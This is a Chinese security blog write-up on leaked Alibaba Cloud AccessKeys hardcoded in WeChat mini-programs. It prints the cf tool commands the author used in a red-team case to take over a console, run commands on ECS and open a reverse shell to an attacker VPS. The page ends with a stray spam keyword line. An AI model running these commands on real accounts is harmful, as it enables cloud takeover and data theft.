<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    微信小程序漏洞之accesskey泄露

    VSole2023-11-17 10:28:00

    1. Accesskey泄露漏洞

    這篇文章里面都是以我個人的視角來進行的,因為一些原因,中間刪了好多東西,肯定有很多不正確的地方,希望大家能理解,也能指正其中的錯誤。

    在以前文章里面,我們一起學習過mac下新版微信小程序反編譯學習,通過反編譯,來尋找一些漏洞,今天來學習下小程序里面的硬編碼漏洞,其實硬編碼漏洞,在這里指的是一些osskeyoss存儲桶賬號密碼信息等寫死在了小程序里面,通過反編譯可以直接找到這些信息。

    Accesskey就是密鑰,可以直接理解為賬號密碼信息,一般由AccessKeySecretOSSAccessKeyId組成,可以通過諸多工具登錄云服務器。

    關鍵字:ossaccesskey

    這種泄露,目前我反編譯過很多小程序里面,也只遇到過幾次而已(可能與我接到的需求不同有關),當小程序反編譯之后,可以在里面全局搜索關鍵字,然后看下。

    這種漏洞很簡單,其實無論是小程序還是app,都是硬編碼導致的漏洞。

    本文僅對mac版較新的3.8.1版本的微信展開,不對其他環境負責。

    本文的操作均是在有授權的情況下進行的。

    2. AccessKey泄露案例-某電力行業

    在某次攻防演練中,通過信息搜集到某電力行業存在商業小程序,于是通過反編譯該小程序,進行快速打點,在這里直接搜到了泄露的Accesskey信息:



    通過該信息直接在cf工具上進行配置,查看當前權限:

    ./cf alibaba perm
    


    獲取其中的存儲桶信息:

    ./cf alibaba oss ls
    


    直接看下多少個桶:

    ./cf alibaba oss ls -n 100
    


    利用命令接管賬號權限:(此命令執行之后,阿里云會給賬戶所有者發送短信和郵件進行提醒)

    ./cf alibaba console
    

    列出當前的ecs資源:

    ./cf alibaba ecs ls
    


    列出ecs之后,執行命令,嘗試執行命令:

    ./cf alibaba ecs exec -b
    

    反彈shell看下:

    ./cf alibaba ecs exec --lhost 攻擊機vps --lport 4144 -i i-2
    

    反彈到shell之后,通過命令尋找到了其中存在nacos服務,最終在數據庫中找到10w+敏感用戶數據。

    3. 總結

    在有授權的情況下,如果是hw的話,一般時間緊,任務重,主要是以發現有效的信息、RCE為主,而Accesskey這種一般在hw里面出現的可能性還是比較小的,但是在市面上一些其他的小程序里面找到還是相對比較容易的,比如以前看到的某成人用品店:

    這個是在以前滲透的時候遇到的:


    當時正在學習小程序(比較好奇哪些朋友用過),于是就對其進行了簡單的分析,逆向之后就發現了不得了的東西:


    當然,因為沒有授權,在這里也就結束了。

    信息安全微信小程序
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    程序如何越權訪問APP內的特權API?研究員發現身份混淆攻擊。
    2022年信息安全領域四大頂會之一USENIX Security拉開帷幕。今年又有好消息傳來——復旦大學教授楊珉等研究員發表的論文被評為“杰出論文獎”。而這些被委托出去的功能也被稱為“子APP”,最常見的莫過于程序。結果顯示,上述的三種身份混淆在所有47個被研究的APP中普遍存在。另外,研究團隊還負責任地向以上APP的開發者們報告了這一結果,并幫助他們進行漏洞修復。
    2022年上半年,浙江省委保密委員會辦公室、省國家保密局依法依規查處了一批違反保密法律法規的案件,泄密相對比較突出。現通報6起典型案例。 1節假日用轉發涉密文件 1月30日,溫州市某銀行工作人員劉某某前往上級部門領取了1份秘密級文件。該行領導林某考慮到春節后馬上要報送材料,便要求劉某某將該涉密文件拍照以方式發給她。林某收到文件后,又要求劉某某將涉密文件發給同事尤某某。此后,
    “公務咔”發布會近年來,因違規使用QQ、等社交軟件辦公導致信息外泄事件頻發,屢禁不止,不少機關干部被問責、處分。事后,胡某某被誡勉談話,并作深刻檢討。經查,群內員均未通過其他任何途徑傳播該圖片。事后,張某受到黨內警告處分,并作出書面檢查。公務咔符合工作秘密安全傳輸要求,助力黨政機關解決工作秘密傳輸渠道缺乏的問題,目前已在福建省國家保密局投入試用。
    數字化時代,傳統快企業紛紛向線上轉型升級,大量業務基于APP、程序、H5 、等渠道接入,直接面向消費者展開花樣百出的線上營銷活動,如:掃碼領紅包、集卡送好禮、分享得立減金…… 然而,在快行業一片欣欣向榮的背后,黑產分子早已伺機出動,沉浸在各大品牌的羊毛雨中樂此不疲。數據顯示,如果企業在營銷時不做風險控制,黑產比例一般在20%以上,甚至有一些高達50%,各個品牌被黑產薅掉的營銷費用非常高
    1月29日,上海市網辦通報稱,已依法對一批未有效履行消費者個人信息保護責任、存在嚴重問題的知名企業予以行政處罰。記者通過采訪了解到,作為火鍋界“頂流”的某知名火鍋連鎖品牌赫然在列。
    近期,北京市公安局網安部門加大對不履行網絡安全保護義務違法行為的打擊力度,切實壓緊壓實網絡運營者的主體責任,對未建立管理制度、不履行網絡信息安全管理義務的多家違法企業依法給予行政處罰。
    新能源汽車充電安全性和可靠性正為眾多用戶以及場站運營商重點關注的部分,目前很多傳統充電樁企業對網絡安全的防護遠遠不足。對于充電樁信息安全防御能力問題,有業內專家指出,保障用戶數據的安全,需采取多項措施。Tellus Power集團VP Srikanth表示。
    2018年7月起,Chrome瀏覽器的地址欄把一切HTTP標明為不安全網站,這一標準已在主流瀏覽器中實行。為了避免以上情況的發生,企業應及時為網站部署SSL證書。且根據我國等保2.0的規定,信息傳輸要進行加密,如果單位網站要求達到等保2.0的網站,安裝SSL證書就是必須的了。一些網站達不到等級保護要求而出現安全事故也要被處罰。
    12月12日下午,“2022網絡安全治理機制高峰論壇”在京召開。論壇上,人民網“人民投訴”平臺聯合中國互聯網協會12321網絡不良與垃圾信息舉報受理中心共同開通“網絡安全”投訴通道。谷海燕認為,基于數據安全和個人信息保護視域,可從預防高發時間、鎖定高發人群、整治網絡平臺三方面探索電信網絡詐騙防控機制。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类